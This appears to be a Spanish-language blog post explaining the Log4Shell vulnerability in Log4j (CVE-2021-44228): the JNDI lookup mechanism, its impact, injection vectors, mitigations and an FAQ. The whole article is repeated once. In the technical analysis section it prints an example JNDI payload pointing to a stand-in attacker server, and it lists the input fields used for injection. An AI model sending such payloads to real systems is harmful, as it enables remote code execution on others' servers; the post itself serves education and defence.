La luz parpadeante del monitor era la única compañía mientras los logs del servidor escupían una anomalía. Una que no debería estar ahí. No era un error de sintaxis, ni un pico de tráfico inusual. Era un susurro en el código, una puerta trasera disfrazada de mensaje de registro. Y esa noche, el 10 de diciembre de 2021, ese susurro se convirtió en un grito que resonó en cada rincón de la red global. Hablamos de Log4j, o para ser más precisos, de la devastadora vulnerabilidad CVE-2021-44228, apodada Log4Shell. Millones de servidores, desde las entrañas de la infraestructura crítica hasta la más humilde aplicación web, se encontraron de repente expuestos. No vamos a parchear un sistema hoy; vamos a realizar una autopsia digital de uno de los fallos de seguridad más catastróficos de las últimas décadas.

Tabla de Contenidos

• Introducción a Log4j y el Descubrimiento
• Análisis Técnico: Cómo Funciona Log4Shell
• El Terremoto Digital: Impacto Global de Log4Shell
• Vectores de Ataque Comunes
• Estrategias de Mitigación y Defensa
• Arsenal del Operador/Analista
• Preguntas Frecuentes
• El Contrato: Asegura tu Perímetro

Introducción a Log4j y el Descubrimiento

Log4j es una utilidad de registro de código abierto basada en Java, utilizada en innumerables aplicaciones y servicios. Su función es simple: registrar eventos, errores y otra información útil para la depuración y el monitoreo. Sin embargo, su ubicuidad es precisamente lo que la convirtió en un blanco tan tentador. El 10 de diciembre de 2021, la comunidad de seguridad se vio sacudida por la divulgación pública de una vulnerabilidad crítica (CVE-2021-44228) dentro de esta librería. Lo que comenzó como un aviso, rápidamente escaló a una crisis de ciberseguridad global cuando se hizo evidente la facilidad con la que podía ser explotada.

Los primeros informes detallaban cómo la librería procesaba ciertas cadenas de texto, permitiendo la ejecución remota de código (RCE) bajo condiciones específicas. La noticia se propagó como la pólvora, y los atacantes, en cuestión de horas, comenzaron a escanear la red en busca de sistemas vulnerables, probando y explotando la falla antes de que la mayoría de las organizaciones pudieran siquiera comprender su alcance.

Análisis Técnico: Cómo Funciona Log4Shell

La clave de Log4Shell reside en una característica llamada Message Lookup Substitution, específicamente a través de la integración con JNDI (Java Naming and Directory Interface). JNDI es una API de Java que permite a las aplicaciones buscar datos y objetos a través de un nombre. Log4j, al procesar mensajes de log, permitía la interpretación de ciertas cadenas que comenzaban con ${ y terminaban con }.

Cuando un atacante podía inyectar una cadena maliciosa en un campo que Log4j registraría, podía forzar a la aplicación a realizar una búsqueda JNDI. La sintaxis crítica para la explotación se ve así:

${jndi:ldap://servidor-del-atacante.com/recurso-malicioso}

Aquí, servidor-del-atacante.com es un servidor controlado por el atacante, y recurso-malicioso es típicamente un archivo Java (como un RMI o un objeto LDAP) que contiene código malicioso compilado. Cuando la aplicación vulnerable interpreta esta cadena:

1. Log4j ve la sintaxis ${jndi:...}.
2. Realiza una búsqueda JNDI a través de LDAP (Lightweight Directory Access Protocol) o RMI (Remote Method Invocation) hacia la URL proporcionada.
3. El servidor del atacante responde, entregando la referencia a un objeto Java remoto.
4. La JVM (Java Virtual Machine) de la aplicación vulnerable, confiando en la fuente, descarga y ejecuta el código de ese objeto remoto.

El resultado es la ejecución de código arbitrario en el servidor de la víctima, con los mismos privilegios que la aplicación vulnerable. Esto es el santo grial para cualquier atacante: control total sobre el sistema comprometido.

El Terremoto Digital: Impacto Global de Log4Shell

La noche del 10 de diciembre de 2021, el mundo digital se congeló. La vulnerabilidad Log4Shell (CVE-2021-44228) se propagó con una velocidad vertiginosa. Las implicaciones eran abrumadoras: desde servicios en la nube como AWS y Azure, hasta aplicaciones empresariales críticas, pasando por productos de consumo y hasta sistemas de control industrial. La librería Log4j es un componente tan fundamental en el ecosistema Java que su compromiso significaba que prácticamente cualquier aplicación Java podía ser vulnerable.

Los atacantes no perdieron tiempo. Los escaneos masivos de la red comenzaron casi de inmediato, buscando cualquier instancia de Log4j expuesta. Los registros de seguridad de miles de empresas se llenaron de intentos de explotación. El impacto se sintió en todos los sectores:

• Infraestructura Crítica: Sectores como energía, finanzas y telecomunicaciones se volvieron objetivos potenciales.
• Servicios en la Nube: Proveedores masivos tuvieron que activar respuestas de emergencia para proteger sus plataformas y a sus clientes.
• Software Empresarial: Aplicaciones de ERP, CRM y otras herramientas de negocio se convirtieron en puntos de entrada.
• Criptomonedas: Exchanges y billeteras digitales, con su alto valor objetivo, fueron rápidamente atacados.

"La confianza es una mercancía rara en la red. Log4j la destrozó en un instante." - cha0smagick

Vectores de Ataque Comunes

La explotación de Log4Shell es insidiosa porque puede ser activada a través de cualquier dato de entrada que termine siendo registrado por una versión vulnerable de Log4j. Esto significa que los atacantes solo necesitan encontrar una forma de hacer que la aplicación registre una cadena maliciosa. Los vectores comunes incluyen:

• Cabeceras HTTP: Cabeceras como User-Agent, Referer, X-Forwarded-For, o cualquier otra cabecera personalizada.
• Parámetros de URL: Cualquier parámetro en la cadena de consulta de una URL.
• Campos de Formulario: Datos enviados a través de formularios web (nombres de usuario, contraseñas, comentarios, etc.).
• Mensajes de Chat o Colaboración: Texto enviado en aplicaciones de mensajería interna o plataformas colaborativas.
• Tokens de Autenticación: Datos de autenticación malformados o manipulados.
• Comandos Ejecutados: Si una aplicación llama a comandos del sistema operativo, la entrada a esos comandos puede ser un vector.

La relativa simplicidad de la explotación permitió que incluso actores de amenazas con habilidades limitadas pudieran causar estragos. La verdadera amenaza, sin embargo, residía en la capacidad de los atacantes sofisticados para usar esta puerta de entrada para establecer persistencia, moverse lateralmente y exfiltrar datos sensibles.

Estrategias de Mitigación y Defensa

Abordar una vulnerabilidad tan extendida requiere un enfoque multifacético. Las organizaciones tuvieron que actuar rápidamente:

1. Actualización Inmediata: La solución más efectiva fue actualizar Log4j a una versión segura (2.17.1 o posterior para la mayoría de los casos, aunque se lanzaron parches incrementales para abordar diferentes facetas de la vulnerabilidad).
2. Parcheo Temporal (Workarounds): Para sistemas donde la actualización inmediata no era factible, se implementaron soluciones temporales, como eliminar la clase JndiLookup o deshabilitar las sustituciones de JNDI mediante variables de entorno. Por ejemplo, antes de actualizar, se recomendaba setear la variable de sistema: log4j2.formatMsgNoLookups=true.
3. Firewalls y WAFs: Configurar Web Application Firewalls (WAFs) y sistemas de detección/prevención de intrusiones (IDS/IPS) para detectar y bloquear patrones de ataque conocidos. Esto es crucial para detener los escaneos iniciales.
4. Segmentación de Red: Aislar sistemas críticos y limitar la comunicación de red de salida para prevenir la exfiltración de datos o la descarga de payloads maliciosos.
5. Monitoreo Continuo: Vigilar de cerca los logs en busca de intentos de explotación y actividad sospechosa. El análisis forense se volvió vital para identificar y responder a brechas que pudieran haber ocurrido antes de la aplicación de parches.

La lección aquí es clara: la dependencia de librerías de terceros, por muy populares que sean, introduce riesgos inherentes. La gestión de vulnerabilidades y la respuesta a incidentes deben ser procesos ágiles y continuos.

Arsenal del Operador/Analista

Para enfrentar amenazas como Log4Shell, un operador o analista de seguridad necesita un conjunto de herramientas bien afinado. Aquí te presento algunas esenciales:

• Escáneres de Vulnerabilidades: Herramientas como Nessus, OpenVAS o Tenable.io para identificar sistemas con versiones vulnerables de Log4j.
• Herramientas de Análisis de Red: Wireshark y tcpdump para capturar y analizar tráfico de red en busca de patrones de explotación.
• SDS/IPS: Sistemas de Detección y Prevención de Intrusiones como Suricata o Snort, cruciales para filtrar el tráfico malicioso.
• Herramientas de Pentesting: Metasploit Framework o Cobalt Strike para simular ataques y entender las capacidades de explotación.
• Herramientas de Monitoreo de Logs: Plataformas SIEM (Security Information and Event Management) como Splunk, ELK Stack (Elasticsearch, Logstash, Kibana) o Graylog para centralizar y analizar logs en tiempo real.
• Repositorios de Inteligencia de Amenazas: Fuentes como CISA, MITRE ATT&CK, y feeds de IOCs (Indicadores de Compromiso) para mantenerse informado sobre las tácticas de los atacantes.
• Libros Clave: "The Web Application Hacker's Handbook" para entender la raíz de muchas vulnerabilidades web, y "Practical Malware Analysis" para desentrañar el código malicioso.
• Automatización: Scripts en Python o Bash para automatizar tareas de escaneo, parcheo o respuesta.

"La tecnología avanza, pero la naturaleza humana (y sus errores) permanece. Necesitas las herramientas adecuadas para ver la maleza crecer." - cha0smagick

Preguntas Frecuentes

¿Qué versión de Log4j es segura?

Las versiones 2.17.1 (para Java 8) y 2.12.4 (para Java 7) en adelante se consideran seguras frente a las principales vulnerabilidades RCE (CVE-2021-44228 y CVE-2021-45046). Siempre consulta la documentación oficial para la versión más reciente y segura.

¿Cómo puedo saber si mi aplicación usa Log4j?

Debes revisar las dependencias de tus proyectos Java. Si utilizas herramientas de construcción como Maven o Gradle, puedes inspeccionar los archivos `pom.xml` o `build.gradle`. Si usas un IDE, la gestión de dependencias suele ser visible.

¿Es posible usar Log4j de forma segura?

Sí, siempre y cuando se utilice una versión parcheada y se sigan las mejores prácticas de seguridad, como deshabilitar la carga de clases remotas JNDI si no es estrictamente necesario, y validar todas las entradas de usuario.

¿Qué tipos de atacantes explotaron Log4Shell?

Prácticamente todo tipo de actor de amenaza, desde script kiddies hasta grupos APT (Amenaza Persistente Avanzada) y ransomware. Su fácil explotación la hizo universalmente atractiva.

¿Todavía hay sistemas vulnerables?

Lamentablemente, sí. La complejidad de las cadenas de suministro de software y la falta de actualizaciones en entornos heredados significan que aún existen sistemas vulnerables expuestos. La cacería de Log4Shell continúa.

El Contrato: Asegura tu Perímetro

La crisis de Log4Shell fue una llamada de atención brutal. Nos demostró que incluso las herramientas más ubicuas y aparentemente benignas pueden albergar fallos catastróficos. La lección no es demonizar las librerías de terceros, sino comprender el riesgo inherente y aplicar una disciplina rigurosa en la gestión de dependencias y vulnerabilidades.

Tu contrato es claro: no puedes permitirte ignorar lo que reside en tu infraestructura. Identifica tus dependencias, prioriza las actualizaciones y mantén un ojo vigilante en los logs. La próxima vez, el fallo podría no ser tan público, pero el impacto podría ser igual de devastador.

Tu desafío: Realiza una auditoría de dependencias en uno de tus proyectos (o uno de muestra). Identifica todas las librerías de logging y sus versiones. Crea un script simple en Python que use una librería como pipdeptree o similar en el ecosistema de tu lenguaje de desarrollo para listar recursivamente todas las dependencias y sus versiones. Luego, compara tu lista con las bases de datos de vulnerabilidades conocidas. ¿Qué encontraste?

```

Log4j: Autopsia de una Vulnerabilidad que Sacudió la Red

La luz parpadeante del monitor era la única compañía mientras los logs del servidor escupían una anomalía. Una que no debería estar ahí. No era un error de sintaxis, ni un pico de tráfico inusual. Era un susurro en el código, una puerta trasera disfrazada de mensaje de registro. Y esa noche, el 10 de diciembre de 2021, ese susurro se convirtió en un grito que resonó en cada rincón de la red global. Hablamos de Log4j, o para ser más precisos, de la devastadora vulnerabilidad CVE-2021-44228, apodada Log4Shell. Millones de servidores, desde las entrañas de la infraestructura crítica hasta la más humilde aplicación web, se encontraron de repente expuestos. No vamos a parchear un sistema hoy; vamos a realizar una autopsia digital de uno de los fallos de seguridad más catastróficos de las últimas décadas.

Tabla de Contenidos

• Introducción a Log4j y el Descubrimiento
• Análisis Técnico: Cómo Funciona Log4Shell
• El Terremoto Digital: Impacto Global de Log4Shell
• Vectores de Ataque Comunes
• Estrategias de Mitigación y Defensa
• Arsenal del Operador/Analista
• Preguntas Frecuentes
• El Contrato: Asegura tu Perímetro

Introducción a Log4j y el Descubrimiento

Log4j es una utilidad de registro de código abierto basada en Java, utilizada en innumerables aplicaciones y servicios. Su función es simple: registrar eventos, errores y otra información útil para la depuración y el monitoreo. Sin embargo, su ubicuidad es precisamente lo que la convirtió en un blanco tan tentador. El 10 de diciembre de 2021, la comunidad de seguridad se vio sacudida por la divulgación pública de una vulnerabilidad crítica (CVE-2021-44228) dentro de esta librería. Lo que comenzó como un aviso, rápidamente escaló a una crisis de ciberseguridad global cuando se hizo evidente la facilidad con la que podía ser explotada.

Los primeros informes detallaban cómo la librería procesaba ciertas cadenas de texto, permitiendo la ejecución remota de código (RCE) bajo condiciones específicas. La noticia se propagó como la pólvora, y los atacantes, en cuestión de horas, comenzaron a escanear la red en busca de sistemas vulnerables, probando y explotando la falla antes de que la mayoría de las organizaciones pudieran siquiera comprender su alcance.

Análisis Técnico: Cómo Funciona Log4Shell

La clave de Log4Shell reside en una característica llamada Message Lookup Substitution, específicamente a través de la integración con JNDI (Java Naming and Directory Interface). JNDI es una API de Java que permite a las aplicaciones buscar datos y objetos a través de un nombre. Log4j, al procesar mensajes de log, permitía la interpretación de ciertas cadenas que comenzaban con ${ y terminaban con }.

Cuando un atacante podía inyectar una cadena maliciosa en un campo que Log4j registraría, podía forzar a la aplicación a realizar una búsqueda JNDI. La sintaxis crítica para la explotación se ve así:

${jndi:ldap://servidor-del-atacante.com/recurso-malicioso}

Aquí, servidor-del-atacante.com es un servidor controlado por el atacante, y recurso-malicioso es típicamente un archivo Java (como un RMI o un objeto LDAP) que contiene código malicioso compilado. Cuando la aplicación vulnerable interpreta esta cadena:

1. Log4j ve la sintaxis ${jndi:...}.
2. Realiza una búsqueda JNDI a través de LDAP (Lightweight Directory Access Protocol) o RMI (Remote Method Invocation) hacia la URL proporcionada.
3. El servidor del atacante responde, entregando la referencia a un objeto Java remoto.
4. La JVM (Java Virtual Machine) de la aplicación vulnerable, confiando en la fuente, descarga y ejecuta el código de ese objeto remoto.

El resultado es la ejecución de código arbitrario en el servidor de la víctima, con los mismos privilegios que la aplicación vulnerable. Esto es el santo grial para cualquier atacante: control total sobre el sistema comprometido.

El Terremoto Digital: Impacto Global de Log4Shell

La noche del 10 de diciembre de 2021, el mundo digital se congeló. La vulnerabilidad Log4Shell (CVE-2021-44228) se propagó con una velocidad vertiginosa. Las implicaciones eran abrumadoras: desde servicios en la nube como AWS y Azure, hasta aplicaciones empresariales críticas, pasando por productos de consumo y hasta sistemas de control industrial. La librería Log4j es un componente tan fundamental en el ecosistema Java que su compromiso significaba que prácticamente cualquier aplicación Java podía ser vulnerable.

Los atacantes no perdieron tiempo. Los escaneos masivos de la red comenzaron casi de inmediato, buscando cualquier instancia de Log4j expuesta. Los registros de seguridad de miles de empresas se llenaron de intentos de explotación. El impacto se sintió en todos los sectores:

• Infraestructura Crítica: Sectores como energía, finanzas y telecomunicaciones se volvieron objetivos potenciales.
• Servicios en la Nube: Proveedores masivos tuvieron que activar respuestas de emergencia para proteger sus plataformas y a sus clientes.
• Software Empresarial: Aplicaciones de ERP, CRM y otras herramientas de negocio se convirtieron en puntos de entrada.
• Criptomonedas: Exchanges y billeteras digitales, con su alto valor objetivo, fueron rápidamente atacados.

"La confianza es una mercancía rara en la red. Log4j la destrozó en un instante." - cha0smagick

Vectores de Ataque Comunes

La explotación de Log4Shell es insidiosa porque puede ser activada a través de cualquier dato de entrada que termine siendo registrado por una versión vulnerable de Log4j. Esto significa que los atacantes solo necesitan encontrar una forma de hacer que la aplicación registre una cadena maliciosa. Los vectores comunes incluyen:

• Cabeceras HTTP: Cabeceras como User-Agent, Referer, X-Forwarded-For, o cualquier otra cabecera personalizada.
• Parámetros de URL: Cualquier parámetro en la cadena de consulta de una URL.
• Campos de Formulario: Datos enviados a través de formularios web (nombres de usuario, contraseñas, comentarios, etc.).
• Mensajes de Chat o Colaboración: Texto enviado en aplicaciones de mensajería interna o plataformas colaborativas.
• Tokens de Autenticación: Datos de autenticación malformados o manipulados.
• Comandos Ejecutados: Si una aplicación llama a comandos del sistema operativo, la entrada a esos comandos puede ser un vector.

La relativa simplicidad de la explotación permitió que incluso actores de amenazas con habilidades limitadas pudieran causar estragos. La verdadera amenaza, sin embargo, residía en la capacidad de los atacantes sofisticados para usar esta puerta de entrada para establecer persistencia, moverse lateralmente y exfiltrar datos sensibles.

Estrategias de Mitigación y Defensa

Abordar una vulnerabilidad tan extendida requiere un enfoque multifacético. Las organizaciones tuvieron que actuar rápidamente:

1. Actualización Inmediata: La solución más efectiva fue actualizar Log4j a una versión segura (2.17.1 o posterior para la mayoría de los casos, aunque se lanzaron parches incrementales para abordar diferentes facetas de la vulnerabilidad).
2. Parcheo Temporal (Workarounds): Para sistemas donde la actualización inmediata no era factible, se implementaron soluciones temporales, como eliminar la clase JndiLookup o deshabilitar las sustituciones de JNDI mediante variables de entorno. Por ejemplo, antes de actualizar, se recomendaba setear la variable de sistema: log4j2.formatMsgNoLookups=true.
3. Firewalls y WAFs: Configurar Web Application Firewalls (WAFs) y sistemas de detección/prevención de intrusiones (IDS/IPS) para detectar y bloquear patrones de ataque conocidos. Esto es crucial para detener los escaneos iniciales.
4. Segmentación de Red: Aislar sistemas críticos y limitar la comunicación de red de salida para prevenir la exfiltración de datos o la descarga de payloads maliciosos.
5. Monitoreo Continuo: Vigilar de cerca los logs en busca de intentos de explotación y actividad sospechosa. El análisis forense se volvió vital para identificar y responder a brechas que pudieran haber ocurrido antes de la aplicación de parches.

La lección aquí es clara: la dependencia de librerías de terceros, por muy populares que sean, introduce riesgos inherentes. La gestión de vulnerabilidades y la respuesta a incidentes deben ser procesos ágiles y continuos. Para un análisis más profundo de las estrategias de protección, considera explorar cursos de pentesting avanzado que cubren defensas contra RCE.

Arsenal del Operador/Analista

Para enfrentar amenazas como Log4Shell, un operador o analista de seguridad necesita un conjunto de herramientas bien afinado. Aquí te presento algunas esenciales:

• Escáneres de Vulnerabilidades: Herramientas como Nessus, OpenVAS o Tenable.io para identificar sistemas con versiones vulnerables de Log4j. Si buscas automatizar la detección en código, considera la automatización con Python.
• Herramientas de Análisis de Red: Wireshark y tcpdump para capturar y analizar tráfico de red en busca de patrones de explotación.
• SDS/IPS: Sistemas de Detección y Prevención de Intrusiones como Suricata o Snort, cruciales para filtrar el tráfico malicioso.
• Herramientas de Pentesting: Metasploit Framework o Cobalt Strike para simular ataques y entender las capacidades de explotación. La certificación OSCP cubre a fondo estas técnicas.
• Herramientas de Monitoreo de Logs: Plataformas SIEM (Security Information and Event Management) como Splunk, ELK Stack (Elasticsearch, Logstash, Kibana) o Graylog para centralizar y analizar logs en tiempo real.
• Repositorios de Inteligencia de Amenazas: Fuentes como CISA, MITRE ATT&CK, y feeds de IOCs (Indicadores de Compromiso) para mantenerse informado sobre las tácticas de los atacantes.
• Libros Clave: "The Web Application Hacker's Handbook" para entender la raíz de muchas vulnerabilidades web, y "Practical Malware Analysis" para desentrañar el código malicioso.
• Automatización: Scripts en Python o Bash para automatizar tareas de escaneo, parcheo o respuesta.

"La tecnología avanza, pero la naturaleza humana (y sus errores) permanece. Necesitas las herramientas adecuadas para ver la maleza crecer." - cha0smagick

Preguntas Frecuentes

¿Qué versión de Log4j es segura?

Las versiones 2.17.1 (para Java 8) y 2.12.4 (para Java 7) en adelante se consideran seguras frente a las principales vulnerabilidades RCE (CVE-2021-44228 y CVE-2021-45046). Siempre consulta la documentación oficial para la versión más reciente y segura.

¿Cómo puedo saber si mi aplicación usa Log4j?

Debes revisar las dependencias de tus proyectos Java. Si utilizas herramientas de construcción como Maven o Gradle, puedes inspeccionar los archivos `pom.xml` o `build.gradle`. Si usas un IDE, la gestión de dependencias suele ser visible.

¿Es posible usar Log4j de forma segura?

Sí, siempre y cuando se utilice una versión parcheada y se sigan las mejores prácticas de seguridad, como deshabilitar la carga de clases remotas JNDI si no es estrictamente necesario, y validar todas las entradas de usuario. Para un aprendizaje profundo, considera un curso de seguridad en Java.

¿Qué tipos de atacantes explotaron Log4Shell?

Prácticamente todo tipo de actor de amenaza, desde script kiddies hasta grupos APT (Amenaza Persistente Avanzada) y ransomware. Su fácil explotación la hizo universalmente atractiva.

¿Todavía hay sistemas vulnerables?

Lamentablemente, sí. La complejidad de las cadenas de suministro de software y la falta de actualizaciones en entornos heredados significan que aún existen sistemas vulnerables expuestos. La cacería de Log4Shell continúa. La inteligencia de amenazas actualizada es clave para la defensa proactiva.

El Contrato: Asegura tu Perímetro

La crisis de Log4Shell fue una llamada de atención brutal. Nos demostró que incluso las herramientas más ubicuas y aparentemente benignas pueden albergar fallos catastróficos. La lección no es demonizar las librerías de terceros, sino comprender el riesgo inherente y aplicar una disciplina rigurosa en la gestión de dependencias y vulnerabilidades. La postura de seguridad por defecto debe ser la defensa.

Tu contrato es claro: no puedes permitirte ignorar lo que reside en tu infraestructura. Identifica tus dependencias, prioriza las actualizaciones y mantén un ojo vigilante en los logs. La próxima vez, el fallo podría no ser tan público, pero el impacto podría ser igual de devastador.

Tu desafío: Realiza una auditoría de dependencias en uno de tus proyectos (o uno de muestra) que utilice Java. Identifica todas las instancias de Log4j y sus versiones. Crea un script simple en Python que utilice la librería `jake-scan` (o una similar) para escanear tu proyecto en busca de dependencias vulnerables conocidas, incluyendo Log4j. ¿Qué encontraste? Documenta tus hallazgos. La información es poder, y la acción es seguridad.